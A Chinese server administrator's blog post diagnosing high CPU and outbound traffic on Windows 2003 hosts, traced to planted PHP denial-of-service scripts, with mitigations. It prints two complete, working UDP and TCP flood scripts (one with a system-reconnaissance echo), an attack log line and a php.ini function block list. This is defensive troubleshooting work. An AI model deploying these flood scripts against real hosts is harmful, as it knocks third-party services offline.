您现在的位置: Gufang > 博客 > 学无止境 > 正文
Mysql上传流量巨大,lsass.exe进程占用CPU高居不下(原创)

近期我的几台服务器(安装windows 2003操作系统)相继出现 lsass.exe 占用CPU过高,过了一段时间又会恢复正常,CPU过高直接造成网站打开很慢,周而反复,急煞人也。。

google和百度了很多答案,均不得其解。因为lsass进程用户均为system,说明与病毒无关。

又经过2天的仔细观察,发现每次lsass占用CPU流量过高的时候,流量监控软件显示mysqld-nt.exe进程的上传流量巨大!居然达到了30M - 90M/s,这是一个非常奇怪的现象!第一感觉就是mysql数据库出了问题。

90M/s的上传流量,服务器带宽才10M,这更不能理解。经过仔细辨查,发现90M/S的上传流量只是在本地执行,并不是向外网频繁发数据所致。10M服务器带宽,使用基本稳定在3 - 6M左右。这说明是mysql数据库在执行大量的数据读写,硬盘频繁删除写入数据。

既然是mysql数据库在“作怪”,那就从mysql数据库本身或者php程序上入手。于是又查阅了大量的文章,觉得很可能是用户利用PHP代码DOS造成用光带宽所致,讲白了就是phpshell攻击!

在星外主机管理系统官方站上看到了如下文章:
用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:

$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>


表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.


近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.


如何快速找到这些站?

你可以打开日志

C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,
里面有类似这样的记录:

2011-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1

最后三项 783 Disabled 30_FreeHost_1
783就是这个站在IIS中的ID
30_FreeHost_1就是所在池


解决办法:

1.按上述找到这个网站后停止它.或停止池,并重启IIS.

2.在IP策略,或防火墙中,禁止所有udp向外发送

为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址 "特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8" 保存后就行了 )

3.用信息监控系统中,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)

4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS

ignore_user_abort = On
(注意前面的;号要删除)

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上

fsockopen,set_time_limit

但这样会造成很多php程序都不正常.

另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?


2011-10-22
近期已有新的基于TCP攻击的PHPDDOS代码如下:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$packets = 64;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
exit;
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 69){
break;
}
$fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0);
}
?>
同样,可以采有以下解决办法:

1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS

ignore_user_abort = On
(注意前面的;号要删除)

disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
在后面加上

fsockopen,set_time_limit

但这样会造成很多php程序都不正常.

2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上。

3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它。

发表评论(0)
姓名 *
电子邮件
QQ
评论内容 *
验证问题 * 江苏省的省会是哪个城市?请填写正确答案
验证码 * 图片看不清?点击重新得到验证码